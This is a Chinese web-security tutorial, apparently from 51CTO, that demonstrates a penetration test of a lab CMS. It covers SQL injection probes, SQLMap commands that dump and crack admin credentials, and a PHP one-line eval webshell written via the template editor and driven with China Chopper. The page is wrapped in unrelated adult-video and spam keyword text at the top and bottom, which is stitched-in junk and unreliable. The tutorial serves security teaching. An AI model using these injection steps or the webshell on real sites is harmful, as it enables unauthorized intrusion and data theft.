成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

網(wǎng)絡(luò)安全攻防:Web安全之滲透測試

安全 應(yīng)用安全
本文基于某個(gè)開源的CMS搭建一個(gè)靶機(jī),來演示W(wǎng)eb滲透整個(gè)過程。

 [[399373]]

本文基于某個(gè)開源的CMS搭建一個(gè)靶機(jī),來演示W(wǎng)eb滲透整個(gè)過程。

1. SQL注入檢測

在訪問網(wǎng)站時(shí)收集資料,了解網(wǎng)站的各項(xiàng)接口、功能,手動(dòng)測試其每一個(gè)參數(shù)是否存在注入。其中發(fā)現(xiàn)一個(gè)帶參數(shù)ID的頁面,如圖1所示。

圖1  帶參數(shù)ID的頁面

通過手動(dòng)注入判斷該參數(shù)是否為注入點(diǎn),發(fā)現(xiàn)當(dāng)輸入id=10’and‘1’=’0時(shí)返回錯(cuò)誤頁面,如圖2所示。

圖2  返回錯(cuò)誤頁面

而當(dāng)參數(shù)id=10’and‘1’=’1時(shí)仍然顯示為正確頁面,由此懷疑ID參數(shù)后面的and語句內(nèi)容被當(dāng)作SQL語句一部分帶入執(zhí)行,此處可能存在SQL注入。

2. SQL注入利用

純粹的手工注入將花費(fèi)大量時(shí)間和精力,此處利用SQLMap工具對(duì)此疑似SQL注入點(diǎn)的參數(shù)進(jìn)行判斷。

利用SQLMap語句:

–u “http:/*.*.*.*/yx/index.php?r=default/column/content&col=products&id=10*”

判斷該URL是否存在注入,其中,*表示判斷該處參數(shù),其結(jié)果如圖3所示。

圖3  判斷注入結(jié)果

可見參數(shù) id 存在布爾注入、錯(cuò)誤回顯注入、時(shí)間盲注等多種注入隱患。并且 SQLMap直接判斷出其后臺(tái)數(shù)據(jù)庫為MySQL 5.0,服務(wù)器為Apache2.4.3,腳本環(huán)境為PHP5.6.25。

利用SQLMap繼續(xù)查看數(shù)據(jù)庫內(nèi)容,其中利用–dbs參數(shù)查看所有數(shù)據(jù)庫發(fā)現(xiàn)共有5個(gè)庫,如圖4所示。

圖4  查看數(shù)據(jù)庫

猜測yx_test為該CMS的數(shù)據(jù)庫,繼續(xù)深入查看其內(nèi)容。利用–D 庫名–tables可查看指定庫的表名,如圖5所示。

圖5  查看指定庫的表名

共有20張表,需要得到管理員賬號(hào)密碼,因此,利用–T參數(shù)指定表dump其內(nèi)容。

于是得到了該表的結(jié)構(gòu)以及其中數(shù)據(jù),并反解MD5,可以獲得一個(gè)登錄名為admin的賬號(hào)和密碼654321。

3. 后臺(tái)登錄getshell

進(jìn)入后臺(tái),如圖6所示。

圖6  進(jìn)入后臺(tái)

繼續(xù)在后臺(tái)管理平臺(tái)上尋找可上傳Webshell的方法,以取得服務(wù)器Shell權(quán)限。

在進(jìn)入到全局設(shè)置下前臺(tái)模板的管理模板文件功能后,發(fā)現(xiàn)有許多PHP文件,其中利用添加模板的功能可以直接在網(wǎng)頁上編寫PHP文件,并保存到服務(wù)器,如圖7所示。

圖7  編寫PHP文件

利用網(wǎng)頁編輯,寫入一個(gè)一句話木馬,其內(nèi)容為<?php eval($_POST['test']);?>,寫入到一個(gè)名為muma.php的文件,如圖8所示。

圖8  寫入木馬

木馬寫入成功,只需知道網(wǎng)頁地址即可訪問鏈接。

最后利用中國菜刀工具連接該木馬,如圖9所示。

圖9  連接木馬

成功連接站點(diǎn),可以遠(yuǎn)程下載、上傳任意文件,也可運(yùn)行Shell執(zhí)行代碼。 

 

責(zé)任編輯:龐桂玉 來源: 計(jì)算機(jī)與網(wǎng)絡(luò)安全
相關(guān)推薦

2021-05-07 14:12:50

網(wǎng)絡(luò)安全Web安全CSRF

2021-04-27 10:00:27

網(wǎng)絡(luò)安全WebURL

2021-05-08 15:22:31

網(wǎng)絡(luò)安全Web安全SQL

2021-01-21 09:25:22

網(wǎng)絡(luò)安全滲透測試工具

2021-04-30 19:38:42

網(wǎng)絡(luò)安全WebHTTP

2021-06-16 09:40:44

網(wǎng)絡(luò)安全物聯(lián)網(wǎng)代碼

2021-04-23 13:35:41

網(wǎng)絡(luò)安全藍(lán)牙Wi-Fi

2021-04-25 21:45:25

網(wǎng)絡(luò)安全網(wǎng)絡(luò)安全攻防ZigBee安全

2021-03-22 10:52:58

網(wǎng)絡(luò)安全Android數(shù)據(jù)安全

2021-03-15 13:50:24

網(wǎng)絡(luò)安全Android安全機(jī)制

2021-04-01 10:40:22

網(wǎng)絡(luò)安全軟件

2021-04-13 11:30:09

網(wǎng)絡(luò)安全無線網(wǎng)絡(luò)WEP

2021-04-15 11:55:40

網(wǎng)絡(luò)安全無線網(wǎng)絡(luò)WPA

2021-05-24 11:40:50

網(wǎng)絡(luò)安全數(shù)據(jù)庫安全服務(wù)器

2019-01-10 15:44:00

2021-02-23 09:12:46

網(wǎng)絡(luò)安全系統(tǒng)安全OpenSS

2021-02-02 14:02:48

網(wǎng)絡(luò)安全對(duì)稱密碼密鑰

2021-04-06 10:30:49

網(wǎng)絡(luò)安全暗網(wǎng)互聯(lián)網(wǎng)

2021-02-22 08:35:41

網(wǎng)絡(luò)安全Linux系統(tǒng)安全

2021-03-02 14:02:19

網(wǎng)絡(luò)安全系統(tǒng)安全iptables
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 久久久久久久久久久成人 | 久艹网站| 九九热九九 | 美女在线观看国产 | 天色综合网 | 天堂资源 | 婷婷丁香综合网 | 琪琪午夜伦伦电影福利片 | 91亚洲国产| 中文字幕国产日韩 | 色999视频| 超碰成人在线观看 | 亚洲在线免费 | 日韩欧美三级电影在线观看 | 一级片在线观看视频 | 久久免费精品视频 | www312aⅴ欧美在线看 | 精品蜜桃一区二区三区 | 国精产品一区一区三区免费完 | 91伊人| 国产成人精品一区二区三区在线 | 亚洲综合色网站 | 99久久精品一区二区毛片吞精 | 欧美日韩不卡合集视频 | 国产精品色 | 亚洲精品久久久久久久久久久久久 | 天天宗合网 | 免费观看av网站 | 国产 日韩 欧美 在线 | 日韩在线免费视频 | 国产一极毛片 | 视频在线一区二区 | 日韩亚洲视频 | 日韩在线小视频 | av网址在线 | 99pao成人国产永久免费视频 | 国产精品一区二区日韩 | 欧美日韩综合 | 欧美一级久久久猛烈a大片 日韩av免费在线观看 | 久久久国产一区二区 | 精品视频导航 |